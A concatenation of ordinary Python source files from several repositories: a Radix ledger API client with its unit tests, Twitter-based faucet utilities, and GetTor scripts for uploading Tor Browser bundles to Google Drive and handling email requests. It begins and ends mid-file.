succesfully committed to the ledger. The transactions are returned in a paginated format,
ordered by most recent.
Args:
account_address (str): The account to get the transactions for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
cursor (:obj:`str`, optional): A timestamp of when to begin getting transactions.
limit (int): The page size requested. The maximum value is 30 at present
Returns:
dict: A dictionary of the transactions information.
"""
return self.__dispatch(
endpoint = "account/transactions",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier,
"cursor": cursor,
"limit": limit
},
)
# ######################################
# ---------- Token Endpoints ----------
# ######################################
def get_native_token_info(
self,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about XRD, including its Radix Resource Identifier (RRI).
Args:
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the token information
"""
return self.__dispatch(
endpoint = "token/native",
params = {
"at_state_identifier": state_identifier,
}
)
def get_token_info(
self,
token_rri: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about any token, given its Radix Resource Identifier (RRI).
Args:
token_rri (str): The RRI of the token to get the information for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the token information
"""
return self.__dispatch(
endpoint = "token",
params = {
"token_identifier": TokenIdentifier(token_rri),
"at_state_identifier": state_identifier,
}
)
def derive_token_identifier(
self,
public_key: str,
symbol: str
) -> Dict[str, Any]:
""" Returns the Radix Resource Identifier of a token with the given symbol, created by an
account with the given public key.
Args:
public_key (str): The public key of the token creator.
symbol (str): The 3 to 8 character long symbol assigned to the token.
Returns:
dict: A dictionary containing the token's RRI.
"""
return self.__dispatch(
endpoint = "token/derive",
params = {
"symbol": symbol.lower(),
"public_key": {
"hex": public_key
}
}
)
# #########################################
# ---------- Validator Endpoints ----------
# #########################################
def get_validator(
self,
validator_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about a validator, given a validator address
Args:
validator_address (str): An identifier for the validator to get info on.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the validator info.
"""
return self.__dispatch(
endpoint = "validator",
params = {
"validator_identifier": ValidatorIdentifier(validator_address),
"at_state_identifier": state_identifier
}
)
def get_validator_identifier(
self,
public_key: str,
) -> Dict[str, Any]:
""" Returns the validator address associated with the given public key
Args:
public_key (str): The public key of the validator
Returns:
dict: A dictionary of the validator info.
"""
return self.__dispatch(
endpoint = "validator/derive",
params = {
"public_key": {
"hex": public_key
}
}
)
def get_validators(
self,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about all validators.
Args:
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the validators
"""
return self.__dispatch(
endpoint = "validators",
params = {
"at_state_identifier": state_identifier
}
)
def get_validator_stakes(
self,
validator_address: str,
state_identifier: Optional[StateIdentifier] = None,
cursor: Optional[str] = None,
limit: int = 30,
) -> Dict[str, Any]:
""" Returns paginated results about the delegated stakes from accounts to a validator. The
results are totalled by account, and ordered by account age (oldest to newest).
Args:
validator_address (str): A string of the validator address
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
cursor (:obj:`str`, optional): A timestamp of when to begin getting transactions.
limit (int): The page size requested. The maximum value is 30 at present.
Returns:
dict: A dictionary of the validator stakes
"""
return self.__dispatch(
endpoint = "validator/stakes",
params = {
"at_state_identifier": state_identifier,
"validator_identifier": ValidatorIdentifier(validator_address),
"cursor": cursor,
"limit": limit
}
)
# ###########################################
# ---------- Transaction Endpoints ----------
# ###########################################
def get_transaction_rules(
self,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns the current rules used to build and validate transactions in the Radix Engine.
Args:
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the transaction rules.
"""
return self.__dispatch(
endpoint = "transaction/rules",
params = {}
)
def build_transaction(
self,
actions: Union[List[ActionType], radix.ActionBuilder],
fee_payer: str,
message_bytes: Optional[Union[str, bytes, bytearray]] = None,
state_identifier: Optional[StateIdentifier] = None,
disable_token_mint_and_burn: Optional[bool] = None,
) -> Dict[str, Any]:
""" Returns a built unsigned transaction payload, from a set of intended actions.
Args:
actions (Union[List[ActionType], radix.ActionBuilder]): Either a list of actions or an
ActionBuilder used to build create the actions.
fee_payer (str): The address of the wallet paying the fees of the transaction.
message_bytes (Union[str, bytes, bytearray], optional): An optional argument for the
message to include in the transaction. This argument expects the bytes to be passed
to it. So, this should either be the hex string of the bytes or a bytes object.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
disable_token_mint_and_burn (bool, optional): If true, mints and burns (aside from fee
payments) are not permitted during transaction execution.
Returns:
dict: A dictionary of the transaction details and blob
"""
return self.__dispatch(
endpoint = "transaction/build",
params = {
"at_state_identifier": state_identifier,
"actions": actions if isinstance(actions, list) else actions.to_action_list(),
"fee_payer": AccountIdentifier(fee_payer),
"message": message_bytes.hex() if isinstance(message_bytes, (bytes, bytearray)) else message_bytes,
"disable_token_mint_and_burn": disable_token_mint_and_burn
}
)
def finalize_transaction(
self,
unsigned_transaction: Union[str, bytes, bytearray],
signature_der: Union[str, bytes, bytearray],
public_key: str,
submit: Optional[bool] = None
) -> Dict[str, Any]:
""" Returns a signed transaction payload and transaction identifier, from an unsigned
transaction payload and signature.
Args:
unsigned_transaction (Union[str, bytes, bytearray]): A bytes like object containing the
transaction blob.
signature_der (Union[str, bytes, bytearray]): A bytes like object of the signature in
the DER format.
public_key (str): The public key of the sender of the transaction.
submit (Optional[bool]): An optional boolean which defines whether or not a transaction
should be submitted immediately upon finalization.
Returns:
dict: A dictionary of the signed transaction information.
"""
return self.__dispatch(
endpoint = "transaction/finalize",
params = {
"unsigned_transaction": unsigned_transaction if isinstance(unsigned_transaction, str) else unsigned_transaction.hex(),
"signature": {
"bytes": signature_der if isinstance(signature_der, str) else signature_der.hex(),
"public_key": {
"hex": public_key,
}
},
"submit": submit
}
)
def submit_transaction(
self,
signed_transaction: Union[str, bytes, bytearray]
) -> Dict[str, Any]:
""" Submits a signed transaction payload to the network. The transaction identifier from
finalize or submit can then be used to track the transaction status.
Args:
signed_transaction (Union[str, bytes, bytearray]): A string or bytes like object which
contains the bytes of the signed transaction to submit to the network.
Returns:
dict: A dictionary of the submitted transaction information.
"""
return self.__dispatch(
endpoint = "transaction/submit",
params = {
"signed_transaction": signed_transaction if isinstance(signed_transaction, str) else signed_transaction.hex(),
}
)
def transaction_status(
self,
transaction_hash: str,
state_identifier: Optional[StateIdentifier] = None,
) -> Dict[str, Any]:
""" Returns the status and contents of the transaction with the given transaction identifier.
Transaction identifiers which aren't recognised as either belonging to a committed
transaction or a transaction submitted through this Network Gateway may return a
TransactionNotFoundError. Transaction identifiers relating to failed transactions will,
after a delay, also be reported as a TransactionNotFoundError.
Args:
transaction_hash (str): An identifier for the transaction
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Return:
dict: A dictionary of the transaction information.
"""
return self.__dispatch(
endpoint = "transaction/status",
params = {
"transaction_identifier": TransactionIdentifier(transaction_hash),
"at_state_identifier": state_identifier,
}
)
```
#### File: src/radixlib/serializable.py
```python
from abc import ABC, abstractmethod
from typing import Dict, Any
class Serializable(ABC):
""" An abstrat implementation of a serializable class. """
@abstractmethod
def to_dict(self) -> Dict[Any, Any]:
""" Converts the object to a dictionary """
pass
@abstractmethod
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
pass
@classmethod
@abstractmethod
def from_dict(cls, dictionary: Dict[Any, Any]) -> object:
""" Loads an object from a dictionary """
pass
@classmethod
@abstractmethod
def from_json_string(cls, json_string: str) -> object:
""" Loads an object from a JSON string """
pass
```
#### File: tests/actions/test_mint_tokens_action.py
```python
from radixlib.actions import MintTokens
from typing import Dict, Any
import unittest
class TestMintTokensAction(unittest.TestCase):
""" Unit tests for the MintTokens action of mutable tokens """
ActionDict: Dict[str, Any] = {
"to_account": {
"address": "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
},
"amount": {
"value": "10000000000000000000",
"token_identifier": {
"rri": "mutable_tr1q06dd0ut3qmyp4pqkvmeu2dvkwg5f7vm8yeslwvpkt9qcl5vqu"
}
},
"type": "MintTokens"
}
def test_from_dict(self):
""" Tests the derivation of the mainnet wallet addresses from the public key """
# The action loaded from the dictionary
mint: MintTokens = MintTokens.from_dict(self.ActionDict)
# Asserting that the MintTokens object understood the content of the dictionary
self.assertEqual(mint.to_account.address, self.ActionDict['to_account']['address'])
self.assertEqual(mint.amount, int(self.ActionDict['amount']['value']))
self.assertEqual(mint.token_rri, self.ActionDict['amount']['token_identifier']['rri'])
def test_to_dict(self):
""" Tests the conversion of the token account to a dictionary """
# The account loaded from the dictionary
account: MintTokens = MintTokens.from_dict(self.ActionDict)
self.assertEqual(account.to_dict(), self.ActionDict)
```
#### File: tests/actions/test_mutable_token_action.py
```python
from radixlib.actions import CreateTokenDefinition
from typing import Dict, Any
import unittest
class TestMutableTokenAction(unittest.TestCase):
""" Unit tests for the CreateTokenDefinition action of mutable tokens """
ActionDict: Dict[str, Any] = {
"token_properties": {
"name": "MutableTest",
"description": "An amazing new token with great utility!",
"icon_url": "https://www.google.com/",
"url": "https://www.google.com/",
"symbol": "mutable",
"is_supply_mutable": True,
"granularity": "1",
"owner": {
"address": "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
}
},
"token_supply": {
"value": "0",
"token_identifier": {
"rri": "mutable_tr1q06dd0ut3qmyp4pqkvmeu2dvkwg5f7vm8yeslwvpkt9qcl5vqu"
}
},
"type": "CreateTokenDefinition"
}
def test_from_dict(self):
""" Tests the derivation of the mainnet wallet addresses from the public key """
# The action loaded from the dictionary
creation: CreateTokenDefinition = CreateTokenDefinition.from_dict(self.ActionDict)
# Asserting that the CreateTokenDefinition object understood the content of the dictionary
self.assertEqual(creation.name, self.ActionDict['token_properties']['name'])
self.assertEqual(creation.description, self.ActionDict['token_properties']['description'])
self.assertEqual(creation.icon_url, self.ActionDict['token_properties']['icon_url'])
self.assertEqual(creation.url, self.ActionDict['token_properties']['url'])
self.assertEqual(creation.symbol, self.ActionDict['token_properties']['symbol'])
self.assertEqual(creation.is_supply_mutable, self.ActionDict['token_properties']['is_supply_mutable'])
self.assertEqual(creation.granularity, int(self.ActionDict['token_properties']['granularity']))
self.assertEqual(creation.owner.address, self.ActionDict['token_properties']['owner']['address'])
self.assertEqual(creation.token_supply, int(self.ActionDict['token_supply']['value']))
self.assertEqual(creation.token_rri, self.ActionDict['token_supply']['token_identifier']['rri'])
self.assertEqual(creation.to_account, None)
def test_to_dict(self):
""" Tests the conversion of the token account to a dictionary """
# The account loaded from the dictionary
account: CreateTokenDefinition = CreateTokenDefinition.from_dict(self.ActionDict)
self.assertEqual(account.to_dict(), self.ActionDict)
```
#### File: tests/actions/test_transfer_tokens_action.py
```python
from radixlib.actions import TransferTokens
from typing import Dict, Any
import unittest
class TestTransferTokensAction(unittest.TestCase):
""" Unit tests for the TransferTokens action of mutable tokens """
ActionDict: Dict[str, Any] = {
"from_account": {
"address": "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
},
"to_account": {
"address": "tdx1qspsl85c9cpgm8t906zewv66quyg6d4gdlru2q9ujgk0u66c8kw2t6caan5qa"
},
"amount": {
"value": "100000000000000000000",
"token_identifier": {
"rri": "xrd_tr1qyf0x76s"
}
},
"type": "TransferTokens"
}
def test_from_dict(self):
""" Tests the derivation of the mainnet wallet addresses from the public key """
# The action loaded from the dictionary
mint: TransferTokens = TransferTokens.from_dict(self.ActionDict)
# Asserting that the TransferTokens object understood the content of the dictionary
self.assertEqual(mint.to_account.address, self.ActionDict['to_account']['address'])
self.assertEqual(mint.from_account.address, self.ActionDict['from_account']['address'])
self.assertEqual(mint.amount, int(self.ActionDict['amount']['value']))
self.assertEqual(mint.token_rri, self.ActionDict['amount']['token_identifier']['rri'])
def test_to_dict(self):
""" Tests the conversion of the token account to a dictionary """
# The account loaded from the dictionary
account: TransferTokens = TransferTokens.from_dict(self.ActionDict)
self.assertEqual(account.to_dict(), self.ActionDict)
```
#### File: tests/api_types/test_state_identifier.py
```python
from radixlib.api_types.identifiers import StateIdentifier
import dateparser
import unittest
class TestStateIdentifier(unittest.TestCase):
""" Unit tests for the StateIdentifier class """
def test_all_missing(self):
""" Testing the case where a state identifier is passed with all missing arguments """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier()
self.assertEqual(state_identifier.to_dict(), {})
def test_only_version(self):
""" Testing the case where only a version is given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
version = 123922
)
self.assertEqual(state_identifier.to_dict(), {"version": 123922})
def test_only_timestamp(self):
""" Testing the case where only a timestamp is given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
timestamp = dateparser.parse('2022-02-01T11:28:53.707Z')
)
self.assertEqual(state_identifier.to_dict(), {"timestamp": "2022-02-01T11:28:53.707Z"})
def test_only_epoch(self):
""" Testing the case where only an epoch is given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
epoch = 322,
)
self.assertEqual(state_identifier.to_dict(), {"epoch": 322})
def test_only_epoch_and_round(self):
""" Testing the case where only an epoch and round are given. """
# Creating the state identifier
state_identifier: StateIdentifier = StateIdentifier(
epoch = 322,
round = 12
)
self.assertEqual(state_identifier.to_dict(), {"epoch": 322, "round": 12})
def test_only_round_given(self):
""" Testing the case where only a round is given """
try:
# Creating the state identifier
StateIdentifier(
round = 12
)
self.assertTrue(True is False)
except:
self.assertTrue(True is True)
def test_only_timestamp_and_epoch(self):
""" Testing the case where only a timestamp and an epoch """
try:
# Creating the state identifier
StateIdentifier(
timestamp = dateparser.parse('2022-02-01T11:28:53.707Z'),
round = 12,
)
self.assertTrue(True is False)
except:
self.assertTrue(True is True)
``` |
{
"source": "0xOmarA/RadixStokenetFaucet",
"score": 4
} |
#### File: RadixStokenetFaucet/faucet_app/utils.py
```python
from typing import Dict, Optional, Union, List
from faucet_proj import secrets
import dateparser
import validators
import requests
import re
def load_tweet_info(tweet_id: Union[int, str]) -> dict:
"""
This method is used to load the information for a given tweet through the twitter
API and the bearer token saved in the secrets.py file.
# Arguments
* `tweet_id: Union[int, str]` - An integer of the tweet id
# Returns
* `dict` - A dictionary containing the information of this given tweet.
# Raises
* `Exception` - A generic exception is raised if an error is encountered when we query
the API for the tweet's information.
"""
# Making the request to the twitter API for the information that we need
response: requests.Response = requests.get(
url = f"https://api.twitter.com/2/tweets/{tweet_id}",
headers = {
"Authorization": f"Bearer {secrets.twitter_bearer_token}"
},
params = {
"tweet.fields": ",".join(["created_at", "author_id"]),
"expansions": ",".join(["author_id"]),
"user.fields": ",".join(["created_at"]),
}
)
response_json: dict = response.json()
# Checking if there had been an error when retrieving the information for
# this tweet. If there had been, we throw a generic `Exception`. We need to
# check for errors using the 'error' key in the json response because the
# status code returned from the twitter API is 200 even if the tweet is not
# found.
if 'errors' in response_json.keys():
raise Exception(f"An error has occured while getting the information of the tweet. Error: {response_json}")
user_object: Dict[str, str] = list(filter(lambda x: x['id'] == response_json['data']['author_id'], response_json['includes']['users']))[0]
return {
"author_id": int(user_object['id']),
"username": user_object['username'],
"name_of_user": user_object['name'],
"tweet_id": int(response_json['data']['id']),
"tweet_text": response_json['data']['text'],
"tweet_created_at": dateparser.parse(response_json['data']['created_at']),
"user_created_at": dateparser.parse(user_object['created_at']),
}
def extract_tweet_id(string: str) -> Optional[int]:
"""
This method is used to search for the tweet id in a given string and return it.
# Arguments
* `string: str` - A string to look for the tweet id in.
# Returns
* `Optional[int]` - Returns an integer of the tweet id when it is found. If it's not
found then None is returned.
"""
matches: list = list(map(int, re.findall(r'twitter\.com\/.*\/status(?:es)?\/([^\/\?]+)', string)))
return None if not matches else matches[0]
def extract_stokenet_addresses(string: str) -> List[str]:
"""
A method which is used to extract all of the stokenet addresses from a given string
# Arguments
* `string: str` - The string to look for the testnet addresses in.
# Returns
* `List[str]` - A list of strings of the stokenet addresses found in the string
"""
return re.findall(
pattern = r'(tdx[0-9]?1[023456789ACDEFGHJKLMNPQRSTUVWXYZacdefghjklmnpqrstuvwxyz]{6,69})',
string = string
)
def is_valid_url(string: str) -> bool:
"""
A simple method which checks if a given string is a valid url or not.
# Arguments
* `string: str` - A string of the potential url.
# Returns
* `bool` - A boolean of whether the given url is a valid url or not.
"""
return bool(validators.url(string))
``` |
{
"source": "0xPoly/gettor",
"score": 2
} |
#### File: 0xPoly/gettor/bundles2drive.py
```python
import re
import os
import gnupg
import hashlib
import ConfigParser
import gettor.core
#import google drive libs
import httplib2
from apiclient.discovery import build
from apiclient.http import MediaFileUpload
from apiclient import errors
from oauth2client.client import FlowExchangeError
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.client import Credentials
def valid_format(file, osys):
"""Check for valid bundle format
Check if the given file has a valid bundle format
(e.g. tor-browser-linux32-3.6.2_es-ES.tar.xz)
:param: file (string) the name of the file.
:param: osys (string) the OS.
:return: (boolean) true if the bundle format is valid, false otherwise.
"""
if(osys == 'windows'):
m = re.search(
'torbrowser-install-\d\.\d\.\d_\w\w(-\w\w)?\.exe',
file)
elif(osys == 'linux'):
m = re.search(
'tor-browser-linux\d\d-\d\.\d\.\d_(\w\w)(-\w\w)?\.tar\.xz',
file)
elif(osys == 'osx'):
m = re.search(
'TorBrowser-\d\.\d\.\d-osx\d\d_(\w\w)(-\w\w)?\.dmg',
file)
if m:
return True
else:
return False
def get_bundle_info(file, osys):
"""Get the os, arch and lc from a bundle string.
:param: file (string) the name of the file.
:param: osys (string) the OS.
:raise: ValueError if the bundle doesn't have a valid bundle format.
:return: (list) the os, arch and lc.
"""
if(osys == 'windows'):
m = re.search(
'torbrowser-install-\d\.\d\.\d_(\w\w)(-\w\w)?\.exe',
file)
if m:
lc = m.group(1)
return 'windows', '32/64', lc
else:
raise ValueError("Invalid bundle format %s" % file)
elif(osys == 'linux'):
m = re.search(
'tor-browser-linux(\d\d)-\d\.\d\.\d_(\w\w)(-\w\w)?\.tar\.xz',
file)
if m:
arch = m.group(1)
lc = m.group(2)
return 'linux', arch, lc
else:
raise ValueError("Invalid bundle format %s" % file)
elif(osys == 'osx'):
m = re.search(
'TorBrowser-\d\.\d\.\d-osx(\d\d)_(\w\w)(-\w\w)?\.dmg',
file)
if m:
os = 'osx'
arch = m.group(1)
lc = m.group(2)
return 'osx', arch, lc
else:
raise ValueError("Invalid bundle format %s" % file)
def get_file_sha256(file):
"""Get the sha256 of a file.
:param: file (string) the path of the file.
:return: (string) the sha256 hash.
"""
# as seen on the internetz
BLOCKSIZE = 65536
hasher = hashlib.sha256()
with open(file, 'rb') as afile:
buf = afile.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = afile.read(BLOCKSIZE)
return hasher.hexdigest()
def upload_files(client, basedir):
"""Upload files to Google Drive.
Looks for tor browser files inside basedir.
:param: basedir (string) path of the folder with the files to be
uploaded.
:param: client (object) Google Drive object.
:raise: UploadError if something goes wrong while uploading the
files to Google Drive. All files are uploaded to '/'.
:return: (dict) the names of the uploaded files as the keys,
and file id as the value
"""
files = []
p = re.compile('.*\.tar.xz$')
for name in os.listdir(basedir):
path = os.path.abspath(os.path.join(basedir, name))
if os.path.isfile(path) and p.match(path)\
and valid_format(name, 'linux'):
files.append(name)
p = re.compile('.*\.exe$')
for name in os.listdir(basedir):
path = os.path.abspath(os.path.join(basedir, name))
if os.path.isfile(path) and p.match(path)\
and valid_format(name, 'windows'):
files.append(name)
p = re.compile('.*\.dmg$')
for name in os.listdir(basedir):
path = os.path.abspath(os.path.join(basedir, name))
if os.path.isfile(path) and p.match(path)\
and valid_format(name, 'osx'):
files.append(name)
# dictionary to store file names and IDs
files_dict = dict()
for file in files:
asc = "%s.asc" % file
abs_file = os.path.abspath(os.path.join(basedir, file))
abs_asc = os.path.abspath(os.path.join(basedir, asc))
if not os.path.isfile(abs_asc):
# there are some .mar files that don't have .asc, don't upload it
continue
# upload tor browser installer
file_body = MediaFileUpload(abs_file, resumable=True)
body = {
'title': file
}
print "Uploading '%s'..." % file
try:
file_data = drive_service.files().insert(body=body, media_body=file_body).execute()
except HttpError, e:
print str(e)
# upload signature
asc_body = MediaFileUpload(abs_asc, resumable=True)
asc_head = {
'title': "%s.asc" % file
}
print "Uploading '%s'..." % asc
try:
asc_data = drive_service.files().insert(body=asc_head, media_body=asc_body).execute()
except HttpError, e:
print str(e)
# add filenames and file id to dict
files_dict[file] = file_data['id']
files_dict[asc] = asc_data['id']
return files_dict
def share_file(service, file_id):
"""Make files public
For a given file-id, sets role 'reader' to 'anyone'. Returns public
link to file.
:param: file_id (string)
:return: (string) url to shared file
"""
permission = {
'type': "anyone",
'role': "reader",
'withLink': True
}
try:
service.permissions().insert(
fileId=file_id, body=permission).execute()
except errors.HttpError, error:
print('An error occured while sharing: %s' % file_id)
try:
file = service.files().get(fileId=file_id).execute()
except errors.HttpError, error:
print('Error occured while fetch public link for file: %s' % file_id)
print("Uploaded to %s" % file['webContentLink'])
return file['webContentLink']
if __name__ == '__main__':
config = ConfigParser.ConfigParser()
config.read('drive.cfg')
client_id = config.get('app', 'client-id')
app_secret = config.get('app', 'secret')
refresh_token = config.get('app', 'refresh_token')
upload_dir = config.get('general', 'upload_dir')
# important: this key must be the one that signed the packages
tbb_key = config.get('general', 'tbb_key')
# requests full access to drive account
OAUTH_SCOPE = 'https://www.googleapis.com/auth/drive'
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
print "Authenticating..."
flow = OAuth2WebServerFlow(client_id, app_secret, OAUTH_SCOPE,
redirect_uri=REDIRECT_URI)
# If no valid token found, need to prompt user.
# this should only occur once
if not refresh_token:
flow.params['access_type'] = 'offline'
flow.params['approval_prompt'] = 'force'
authorize_url = flow.step1_get_authorize_url()
print 'Go to the following link in your browser: ' + authorize_url
code = raw_input('Enter verification code: ').strip()
try:
credentials = flow.step2_exchange(code)
except FlowExchangeError as e:
print str(e)
# oauth2 credentials instance must be stored as json string
config.set('app', 'refresh_token', credentials.to_json())
with open('drive.cfg', 'wb') as configfile:
config.write(configfile)
else:
# we already have a valid token
credentials = Credentials.new_from_json(refresh_token)
# authenticate with oauth2
http = httplib2.Http()
http = credentials.authorize(http)
# initialize drive instance
drive_service = build('drive', 'v2', http=http)
# import key fingerprint
gpg = gnupg.GPG()
key_data = open(tbb_key).read()
import_result = gpg.import_keys(key_data)
fp = import_result.results[0]['fingerprint']
# make groups of four characters to make fingerprint more readable
# e.g. 123A 456B 789C 012D 345E 678F 901G 234H 567I 890J
readable = ' '.join(fp[i:i+4] for i in xrange(0, len(fp), 4))
try:
uploaded_files = upload_files(drive_service, upload_dir)
# use default config
core = gettor.core.Core('/home/gettor/core.cfg')
# erase old links
core.create_links_file('Drive', readable)
# recognize file OS by its extension
p1 = re.compile('.*\.tar.xz$')
p2 = re.compile('.*\.exe$')
p3 = re.compile('.*\.dmg$')
p4 = re.compile('.*\.asc$')
for file in uploaded_files.keys():
# only run for tor browser installers
if p4.match(file):
continue
asc = "%s.asc" % file
abs_file = os.path.abspath(os.path.join(upload_dir, file))
abs_asc = os.path.abspath(os.path.join(upload_dir, asc))
sha_file = get_file_sha256(abs_file)
# build links
link_file = share_file(drive_service,
uploaded_files[file])
link_asc = share_file(drive_service,
uploaded_files["%s.asc" % file])
if p1.match(file):
osys, arch, lc = get_bundle_info(file, 'linux')
elif p2.match(file):
osys, arch, lc = get_bundle_info(file, 'windows')
elif p3.match(file):
osys, arch, lc = get_bundle_info(file, 'osx')
link = "Package (%s-bit): %s\nASC signature (%s-bit): %s\n"\
"Package SHA256 checksum (%s-bit): %s\n" %\
(arch, link_file, arch, link_asc,
arch, sha_file)
# note that you should only upload bundles for supported locales
core.add_link('Drive', osys, lc, link)
except (ValueError, RuntimeError) as e:
print str(e)
```
#### File: gettor/gettor/smtp.py
```python
import os
import re
import sys
import time
import email
import gettext
import logging
import smtplib
import datetime
import ConfigParser
from email.mime.text import MIMEText
import core
import utils
import blacklist
"""SMTP module for processing email requests."""
class ConfigError(Exception):
pass
class AddressError(Exception):
pass
class SendEmailError(Exception):
pass
class InternalError(Exception):
pass
class SMTP(object):
"""Receive and reply requests by email.
Public methods:
process_email(): Process the email received.
Exceptions:
ConfigError: Bad configuration.
AddressError: Address of the sender malformed.
SendEmailError: SMTP server not responding.
InternalError: Something went wrong internally.
"""
def __init__(self, cfg=None):
"""Create new object by reading a configuration file.
:param: cfg (string) path of the configuration file.
"""
# define a set of default values
DEFAULT_CONFIG_FILE = 'smtp.cfg'
logging.basicConfig(format='[%(levelname)s] %(asctime)s - %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
log = logging.getLogger(__name__)
config = ConfigParser.ConfigParser()
if cfg is None or not os.path.isfile(cfg):
cfg = DEFAULT_CONFIG_FILE
config.read(cfg)
try:
self.our_domain = config.get('general', 'our_domain')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'our_domain' from 'general'")
try:
core_cfg = config.get('general', 'core_cfg')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'core_cfg' from 'general'")
try:
blacklist_cfg = config.get('blacklist', 'cfg')
self.bl = blacklist.Blacklist(blacklist_cfg)
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'cfg' from 'blacklist'")
try:
self.bl_max_req = config.get('blacklist', 'max_requests')
self.bl_max_req = int(self.bl_max_req)
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'max_requests' from 'blacklist'")
try:
self.bl_wait_time = config.get('blacklist', 'wait_time')
self.bl_wait_time = int(self.bl_wait_time)
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'wait_time' from 'blacklist'")
try:
self.i18ndir = config.get('i18n', 'dir')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'dir' from 'i18n'")
try:
logdir = config.get('log', 'dir')
logfile = os.path.join(logdir, 'smtp.log')
except ConfigParser.Error as e:
raise ConfigError("Couldn't read 'dir' from 'log'")
try:
loglevel = config.get('log', 'level')
except ConfigParser.Error as e:
raise ConfigurationError("Couldn't read 'level' from 'log'")
# use default values
self.core = core.Core(core_cfg)
# establish log level and redirect to log file
log.info('Redirecting logging to %s' % logfile)
logfileh = logging.FileHandler(logfile, mode='a+')
logfileh.setLevel(logging.getLevelName(loglevel))
log.addHandler(logfileh)
# stop logging on stdout from now on
log.propagate = False
def _is_blacklisted(self, addr):
"""Check if a user is blacklisted.
:param: addr (string) the hashed address of the user.
:return: true is the address is blacklisted, false otherwise.
"""
try:
self.bl.is_blacklisted(addr, 'SMTP', self.bl_max_req,
self.bl_wait_time)
return False
except blacklist.BlacklistError as e:
return True
def _get_lc(self, addr):
"""Get the locale from an email address.
Process the email received and look for the locale in the recipient
address (e.g. <EMAIL>). If no locale found, english
by default.
:param: (string) the email address we want to get the locale from.
:return: (string) the locale (english if none).
"""
# if no match found, english by default
lc = 'en'
# look for <EMAIL>
m = re.match('gettor\+(\w\w)@\w+\.\w+', addr)
if m:
# we found a request for locale lc
lc = "%s" % m.groups()
return lc.lower()
def _get_normalized_address(self, addr):
"""Get normalized address.
We look for anything inside the last '<' and '>'. Code taken from
the old GetTor (utils.py).
:param: addr (string) the address we want to normalize.
:raise: AddressError if the address can't be normalized.
:return: (string) the normalized address.
"""
if '<' in addr:
idx = addr.rindex('<')
addr = addr[idx:]
m = re.search(r'<([^>]*)>', addr)
if m is None:
# malformed address
raise AddressError("Couldn't extract normalized address "
"from %s" % self_get_sha256(addr))
addr = m.group(1)
return addr
def _get_content(self, email):
"""Get the body content of an email.
:param: email (object) the email object to extract the content from.
:return: (string) body of the message.
"""
# get the body content of the email
maintype = email.get_content_maintype()
if maintype == 'multipart':
for part in email.get_payload():
if part.get_content_maintype() == 'text':
return part.get_payload()
elif maintype == 'text':
return email.get_payload()
def _get_msg(self, msgid, lc):
"""Get message identified by msgid in a specific locale.
:param: msgid (string) the identifier of a string.
:param: lc (string) the locale.
:return: (string) the message from the .po file.
"""
# obtain the content in the proper language
t = gettext.translation(lc, self.i18ndir, languages=[lc])
_ = t.ugettext
msgstr = _(msgid)
return msgstr
def _parse_email(self, msg, addr):
"""Parse the email received.
Get the locale and parse the text for the rest of the info.
:param: msg (string) the content of the email to be parsed.
:param: addr (string) the address of the recipient (i.e. us).
:return: (list) 4-tuple with locale, os and type of request.
"""
req = self._parse_text(msg)
lc = self._get_lc(addr)
req['lc'] = lc
return req
def _parse_text(self, msg):
"""Parse the text part of the email received.
Try to figure out what the user is asking, namely, the type
of request, the package and os required (if applies).
:param: msg (string) the content of the email to be parsed.
:return: (list) 3-tuple with the type of request, os and pt info.
"""
# by default we asume the request is asking for help
req = {}
req['type'] = 'help'
req['os'] = None
# core knows what OS are supported
supported_os = self.core.get_supported_os()
# if no OS is found, help request by default
# if both OS and checksum request found, first one takes precendence
found_os = False
found_checksums = False
lines = msg.split(' ')
for word in lines:
if not found_os and not found_checksums:
for os in supported_os:
if re.match(os, word, re.IGNORECASE):
req['os'] = os
